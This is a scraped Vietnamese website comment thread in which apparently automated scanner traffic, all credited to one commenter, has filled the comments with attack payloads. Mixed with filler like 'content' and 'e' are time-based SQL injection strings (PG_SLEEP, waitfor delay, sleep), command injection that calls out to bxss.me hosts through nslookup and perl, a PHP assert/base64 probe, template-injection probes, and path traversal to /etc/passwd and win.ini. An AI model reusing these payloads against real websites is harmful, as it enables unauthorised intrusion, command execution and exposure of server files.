nguyễn văn dũng -
26.10.2022
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
".gethostbyname(lc("hitiv"."jsfeepxnd1591.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(74).chr(110).chr(65)."
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
'.gethostbyname(lc('hitei'.'nejilwksce4f1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(82).chr(97).chr(73).'
replyTrả lời
nguyễn văn dũng -
26.10.2022
content
replyTrả lời
nguyễn văn dũng -
26.10.2022
1????%2527%2522
replyTrả lời
nguyễn văn dũng -
26.10.2022
@@JBkTl
replyTrả lời
nguyễn văn dũng -
26.10.2022
1'"
replyTrả lời
nguyễn văn dũng -
26.10.2022
e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
replyTrả lời
nguyễn văn dũng -
26.10.2022
NtCWT87z')) OR 520=(SELECT 520 FROM PG_SLEEP(15))--
replyTrả lời
nguyễn văn dũng -
26.10.2022
Dd2GWBuT') OR 102=(SELECT 102 FROM PG_SLEEP(15))--
replyTrả lời
nguyễn văn dũng -
26.10.2022
gIvRx1EU' OR 316=(SELECT 316 FROM PG_SLEEP(15))--
replyTrả lời
nguyễn văn dũng -
26.10.2022
6DYn5K44'; waitfor delay '0:0:15' --
replyTrả lời
nguyễn văn dũng -
26.10.2022
1 waitfor delay '0:0:15' --
replyTrả lời
nguyễn văn dũng -
26.10.2022
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
1a2rsRGcO
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
12345'"\'\");|]*{ <>?''????
replyTrả lời
nguyễn văn dũng -
26.10.2022
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
replyTrả lời
nguyễn văn dũng -
26.10.2022
;(nslookup hitpaqiaangcq7e21a.bxss.me||perl -e "gethostbyname('hitpaqiaangcq7e21a.bxss.me')")|(nslookup hitpaqiaangcq7e21a.bxss.me||perl -e "gethostbyname('hitpaqiaangcq7e21a.bxss.me')")&(nslookup hitpaqiaangcq7e21a.bxss.me||perl -e "gethostbyname('hitpaqiaangcq7e21a.bxss.me')")
Xem thêmThu gọn
replyTrả lời
nguyễn văn dũng -
26.10.2022
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx__${98991*97996}__::.x
replyTrả lời
nguyễn văn dũng -
26.10.2022
`(nslookup hitxgjgjiqjpa230c4.bxss.me||perl -e "gethostbyname('hitxgjgjiqjpa230c4.bxss.me')")`
replyTrả lời
nguyễn văn dũng -
26.10.2022
../e
replyTrả lời
nguyễn văn dũng -
26.10.2022
|(nslookup hiterfohueirw96094.bxss.me||perl -e "gethostbyname('hiterfohueirw96094.bxss.me')")
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx[[${98991*97996}]]xca
replyTrả lời
nguyễn văn dũng -
26.10.2022
if(now()=sysdate(),sleep(15),0)
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
../../../../../../../../../../../../../../windows/win.ini
replyTrả lời
nguyễn văn dũng -
26.10.2022
&(nslookup hitrbmlczmuka343e1.bxss.me||perl -e "gethostbyname('hitrbmlczmuka343e1.bxss.me')")&'\"`0&(nslookup hitrbmlczmuka343e1.bxss.me||perl -e "gethostbyname('hitrbmlczmuka343e1.bxss.me')")&`'
replyTrả lời
nguyễn văn dũng -
26.10.2022
acx{{98991*97996}}xca
replyTrả lời
nguyễn văn dũng -
26.10.2022
e
replyTrả lời
nguyễn văn dũng -
26.10.2022
$(nslookup hitapighkgzwz43ae8.bxss.me||perl -e "gethostbyname('hitapighkgzwz43ae8.bxss.me')")
replyTrả lời
nguyễn văn dũng -
26.10.2022
../../../../../../../../../../../../../../etc/passwd
replyTrả lời
nguyễn văn dũng -
26.10.2022
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
replyTrả lời
nguyễn văn dũng -
26.10.2022
<th:t="${acx}#foreach
replyTrả lời
nguyễn văn dũng -
26.10.2022
|echo wayivo$()\ zoexxq\nz^xyu||a #' |echo wayivo$()\ zoexxq\nz^xyu||a #|" |echo wayivo$()\ zoexxq\nz^xyu||a #
replyTrả lời
nguyễn văn dũng -
26.10.2022
<%={{={@{#{${acx}}%>
replyTrả lời
nguyễn văn dũng -
26.10.2022
/\xfs.bxss.me
replyTrả lời
nguyễn văn dũng -
26.10.2022
(nslookup hitldwelzmpdjb724b.bxss.me||perl -e "gethostbyname('hitldwelzmpdjb724b.bxss.me')")
replyTrả lời
nguyễn văn dũng -
26.10.2022
OLcuVwXF
replyTrả lời
nguyễn văn dũng -
26.10.2022
&echo ioqnjg$()\ xkfurt\nz^xyu||a #' &echo ioqnjg$()\ xkfurt\nz^xyu||a #|" &echo ioqnjg$()\ xkfurt\nz^xyu||a #
replyTrả lờ